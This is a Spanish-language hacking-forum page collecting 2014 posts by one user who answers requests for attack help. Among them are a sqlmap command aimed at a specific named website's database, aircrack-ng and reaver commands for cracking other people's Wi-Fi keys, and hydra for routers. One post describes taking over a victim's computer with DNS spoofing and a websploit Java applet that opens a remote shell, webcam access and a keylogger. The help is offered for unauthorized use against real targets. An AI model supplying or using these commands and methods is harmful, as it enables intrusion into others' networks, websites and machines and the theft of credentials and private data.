Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - noopynoob

#101
Nivel Web / Re: problema inyeccion SQL
25 Enero 2014, 17:19 PM
Cita de: BigByte en 25 Enero 2014, 16:51 PM
Y es posible saltarse eso.?? Me refiero hay alguna forma de bypassear esa protección para llevar a cabo la inyeccion sql o la web ya no es vulnerable ??


Agradecería un tutorial o una referencia , soy todo oídos !!

Gracias

sqlmap -u www.fabasket.com/noticia.php?id=1007 --dbms=oracle --risk=5 --level=5 --dbs
#102
cd /root/swireless/WPSPinGenerator/Keys/
vim ._._._._._._.txt
#103
bueno no son cifras, una cifra es un numero no letras, y para obtener la clave de la red como cualquier otra, una vez que tengas el handshake puedes generar un diccionario de 8 a 9 dígitos y si no funciona tendrías que descargarte un buen diccionario de las claves mas comunes para ver si tienes suerte.

este seria el comando:

aircrack-ng -w diccionario.txt -b MAC handshake.cap

diccionario.txt es el nombre del diccionario
MAC es la mac a atacar
handshake.cap es el handshake

el tiempo es totalmente desconocido y si tiene wps activado es mas facil con otro metodo.
#104
osea que es de la red wifi? pues usa aircrack, lo que no entiendo es a que te refieres con 5 cifras si las redes wpa tienen claves como mínimo 8 caracteres
#105
Cita de: DefaultUser en 25 Enero 2014, 01:16 AM
Tienes toda la razón amigo, de seguro usó ingeniera inversa como tu dices.

Disculpa que cambie de tema pero es pura curiosidad, ¿Cónoces algun programa que haga eso de ejecutar un .exe y ya te apoderas de la máquina? ¿Me puedes decir el nombre? Quiero investigar acerca de ello, ya sé que no es sencillo pero bueno, lo investigaré por mi cuenta, si puedes facilitame el nombre.


no es ingeniera inversa eso ya es otra cosa es ingeniera social y el metodo que conozco es que si la victima tiene windows 7 o 8 se puede con el java_applet de websploit solo hay que hacer un dns spoofing a google o facebook y cuando entre digamos a www.google.com se le descarga el programa en java que abre la shell remota y tienes acceso a todos los archivos, la webcam y tambien se puede ejecutar un keylogger, si la victima es del exterior osea fuera de la red LAN ya se complica porque no puedes hacer el DNS spoofing entonces tienes que hacer el ip forwarding y pasarle tu IP publica o ocultarla con un dominio como no-ip. en fin son muchas las cosas que hay tener en cuenta no se si el exploit todavía funcione creo que hay un antivirus que lo detecta, o haya uno mas nuevo etc.

pd. si la victima es winXP se puede hacer sin necesidad de pasarle nada pero no recuerdo el nombre del exploit.
#106
pero es a la red wifi o al router? si la de wifi usa aircrack si es del router usa hydra.
#107
yo digo que el uso algo de ingeniería social quiza hackeando las cuentas de los amigos de los famosos y enviandole malware a su cuenta, como creen saber que es de un conocido ingenuamente entran al link, de ahí se apodero de toda la maquina incluyendo la webcam y publicando las fotos.

No creo que haya usado el método de fuerza bruta para hackear cuentas de facebook, eso es casi imposible, una vez que tenga control de la maquina también puede incluir un keylogger para capturar sus credenciales.

algo gracioso que puso es soy peluchin que es una leyenda en taringa pero duda que sea cierto.
#108
Bugs y Exploits / Re: Metasploit
24 Enero 2014, 20:04 PM
Cita de: n3n3 en 24 Enero 2014, 19:55 PM
Pues ya realize desde una de mis maquinas con backtrack 5 hice un ataque DNS Spoffing y envenenamiento de ARP para obtener claves de mi maquina tangible, osea la principal, y si me funciono, pero agradeceria si alguien me hace saber algun metodo que pueda yo utlizar, y pues escanear bulnerabilidades con nmap desde backtrack, y que ataques conocen para una red local???????????
:-(

Porfavor algun ataque para una red local, que yo pueda probar en mi pequeña red? :huh:

pues se puede hacer el ARP spoofing desde una maquina virtual pero solo afectara a la maquina en donde esta corriendo la maquina virtual y no en las demás, una vez intente penetrar win8 desde backtrack que corría en una maquina virtual y no me funciono entonces quite la mv e inicie backtrack en una laptop y el ataque si funciono.
#109
Bugs y Exploits / Re: Metasploit
24 Enero 2014, 19:51 PM
que yo sepa no se puede desde una maquina virtual ya que la IP no esta dentro del rango, hay que tener dos maquinas para realizar el ataque
#110
Cita de: mafuponce en 23 Enero 2014, 23:14 PM
bueno quizas sea tarde pero ninguno de estos so o progrmas han desifrado las claves wifi de los technicolor de claropr que parece que nadie ha podido dar con el pass y viene con el wps acticado y wpa2 psk y ni las versiones nuevas han podido yo sigo diciendo que esos tutoriales de you tube de sacar claves wifi son embuste no he podido sacar ninguna aunque no me rindo tambien tratado con los aris y nada ummm no se de verdad si sirven

depende de donde hayas sacado el tutorial, estas insultando a toda la comunidad de los pentesters wireless incluyendo los creadores  :-[

pues bien seria una payasada armarse tantos tutoriales y programas solo para engañar y presumir a los dueños, yo he sacado claves WPA con/sin WPS, y déjame decirte que funciona, lei que la red tenia wps activado entonces en backtrack/kali este seria el comando:

reaver -i mon0 -b MAC -c channel -e essid -vv

MAC lo cambias por la mac a atacar
channel lo cambias por el canal de la red a atacar
essid lo cambias por el essid de la red  a atacar

en unas 2 o 4 horas te dará la clave de la red, sino es porque puede que la red este muy lejos o el router no sea vulnerable a este tipo de ataques, en este caso no queda de otra que usar el otro método osea por fuerza bruta aunque este es un poco demorado.